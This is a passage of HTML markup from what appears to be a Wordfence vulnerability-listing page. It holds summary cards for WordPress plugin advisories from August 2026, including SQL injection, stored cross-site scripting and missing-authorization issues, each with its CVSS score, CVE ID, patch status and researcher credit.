<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-oauth-20-server" target="_blank" rel="noopener">WP OAuth Server ( Login with WordPress )</a> <span class="wfvr-software-slug">[miniorange-oauth-20-server]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e5f792b-feb3-442a-ad23-d09c618a4677" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb4c2021-c4b0-4283-9022-a2a6a76bbce8" target="_blank" rel="noopener">WP Rocket 3.23.1 &#8211; 3.23.3.2 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-rocket" target="_blank" rel="noopener">WP Rocket</a> <span class="wfvr-software-slug">[wp-rocket]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb4c2021-c4b0-4283-9022-a2a6a76bbce8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be71d0ad-8306-451d-8276-321ca7ce088b" target="_blank" rel="noopener">WPCafe – Restaurant Menu, Online Food Ordering &amp; Table Booking System &lt; 3.0.18 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14550" target="_blank" rel="noopener noreferrer">							CVE-2026-14550						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-cafe" target="_blank" rel="noopener">WPCafe – Restaurant Menu, Online Food Ordering &amp; Table Booking System</a> <span class="wfvr-software-slug">[wp-cafe]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abiodun-victor-taiwo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ab98975ac05f81bf1e8e943aca71c60.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ab98975ac05f81bf1e8e943aca71c60"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abiodun-victor-taiwo" target="_blank" rel="noopener">ABIODUN VICTOR TAIWO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be71d0ad-8306-451d-8276-321ca7ce088b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa56cbb5-a01a-4feb-a57e-30b8a3832d32" target="_blank" rel="noopener">JetBackup – Backup, Restore &amp; Migrate 3.1.18.8 &#8211; 3.1.23.3 &#8211; Authenticated (Admin+) Backup Download</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19454" target="_blank" rel="noopener noreferrer">							CVE-2026-19454						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup" target="_blank" rel="noopener">JetBackup – Backup, Restore &amp; Migrate</a> <span class="wfvr-software-slug">[backup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/akshat-parikh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8128afd0f91dd0938118b9db5afbfd4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8128afd0f91dd0938118b9db5afbfd4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/akshat-parikh" target="_blank" rel="noopener">Akshat Parikh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa56cbb5-a01a-4feb-a57e-30b8a3832d32" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2c58f4a-1436-4796-bf61-895177639dbe" target="_blank" rel="noopener">Link Whisper Free &lt; 0.9.7 &#8211; Authenticated (Editor+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14601" target="_blank" rel="noopener noreferrer">							CVE-2026-14601						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/link-whisper" target="_blank" rel="noopener">Link Whisper Free</a> <span class="wfvr-software-slug">[link-whisper]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huytqtq" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/59835aea7e82e25c9b26bb683490e69d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59835aea7e82e25c9b26bb683490e69d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huytqtq" target="_blank" rel="noopener">huytqtq</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2c58f4a-1436-4796-bf61-895177639dbe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c42139fc-34a2-47ae-b172-d2cd4f1cf098" target="_blank" rel="noopener">Media Sweep &lt;= 1.1.3 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;fields&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77824" target="_blank" rel="noopener noreferrer">							CVE-2026-77824						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-sweep" target="_blank" rel="noopener">Media Sweep – WordPress Media Cleaner</a> <span class="wfvr-software-slug">[media-sweep]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c42139fc-34a2-47ae-b172-d2cd4f1cf098" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e738142-d1db-48e5-9c5a-823136aa1d05" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt; 6.0.9.4 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77790" target="_blank" rel="noopener noreferrer">							CVE-2026-77790						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e738142-d1db-48e5-9c5a-823136aa1d05" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45029d47-0359-4de2-9d6a-fb2c51edcf75" target="_blank" rel="noopener">WP Ultimate CSV Importer – WordPress CSV, XML &amp; Excel Import &lt; 9.0 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80488" target="_blank" rel="noopener noreferrer">							CVE-2026-80488						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ultimate-csv-importer" target="_blank" rel="noopener">WP Ultimate CSV Importer – WordPress CSV, XML &amp; Excel Import</a> <span class="wfvr-software-slug">[wp-ultimate-csv-importer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaan-buerms" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/88cc8dc4d878286d42f6bc0bff1b9ea1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="88cc8dc4d878286d42f6bc0bff1b9ea1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaan-buerms" target="_blank" rel="noopener">Jaan Buerms</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/45029d47-0359-4de2-9d6a-fb2c51edcf75" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7dcc31c-9255-4bd2-92b4-ce9a1df5f24c" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress &lt;= 3.6.0 &#8211; Authenticated (Administrator+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75796" target="_blank" rel="noopener noreferrer">							CVE-2026-75796						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d7dcc31c-9255-4bd2-92b4-ce9a1df5f24c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dc54e6dd-1529-4ab9-ae56-229d032ad5c6" target="_blank" rel="noopener">CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes &lt; 4.1.18 &#8211; Authenticated (Editor+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13415" target="_blank" rel="noopener noreferrer">							CVE-2026-13415						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance" target="_blank" rel="noopener">CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes</a> <span class="wfvr-software-slug">[cmp-coming-soon-maintenance]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dc54e6dd-1529-4ab9-ae56-229d032ad5c6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3917e62-6d94-4dc6-9324-1188fc072250" target="_blank" rel="noopener">CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes &lt; 4.1.18 &#8211; Authenticated (Editor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13416" target="_blank" rel="noopener noreferrer">							CVE-2026-13416						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance" target="_blank" rel="noopener">CMP – Coming Soon &amp; Maintenance Plugin by NiteoThemes</a> <span class="wfvr-software-slug">[cmp-coming-soon-maintenance]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3917e62-6d94-4dc6-9324-1188fc072250" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/410f232f-610b-4de6-85bf-56f66b5b217e" target="_blank" rel="noopener">Drag and Drop Multiple File Upload for Contact Form 7 &lt; 1.3.9.9 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14325" target="_blank" rel="noopener noreferrer">							CVE-2026-14325						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7" target="_blank" rel="noopener">Drag and Drop Multiple File Upload for Contact Form 7</a> <span class="wfvr-software-slug">[drag-and-drop-multiple-file-upload-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/410f232f-610b-4de6-85bf-56f66b5b217e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f8b8bfe-8d73-4289-b212-7baf7bceaaf6" target="_blank" rel="noopener">LearnPress &lt;= 4.4.4 &#8211; Missing Authorization to Authenticated (Editor+) Limited Option Update via &#8216;field_name&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75982" target="_blank" rel="noopener noreferrer">							CVE-2026-75982						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f8b8bfe-8d73-4289-b212-7baf7bceaaf6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/367ae1ab-fac7-4e17-9a00-0ea167291792" target="_blank" rel="noopener">MW WP Form &lt; 5.1.6 &#8211; Authenticated (Editor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78364" target="_blank" rel="noopener noreferrer">							CVE-2026-78364						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mw-wp-form" target="_blank" rel="noopener">MW WP Form</a> <span class="wfvr-software-slug">[mw-wp-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/367ae1ab-fac7-4e17-9a00-0ea167291792" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb5b64d1-8e13-44aa-b158-4cb6fd50e7cd" target="_blank" rel="noopener">Advanced Custom Fields: Extended &lt;= 0.9.2.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81284" target="_blank" rel="noopener noreferrer">							CVE-2026-81284						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
